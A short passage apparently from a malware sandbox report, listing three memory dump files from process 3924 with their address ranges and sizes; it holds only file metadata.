                                                                • memory/3924-256-0x0000000077070000-0x0000000077285000-memory.dmp

                                                                  Filesize

                                                                  2.1MB

                                                                • memory/3924-253-0x0000000000110000-0x000000000024A000-memory.dmp

                                                                  Filesize

                                                                  1.2MB

                                                                • memory/3924-255-0x0000000000C80000-0x0000000000C81000-memory.dmp

                                                                  Filesize

                                                                  4KB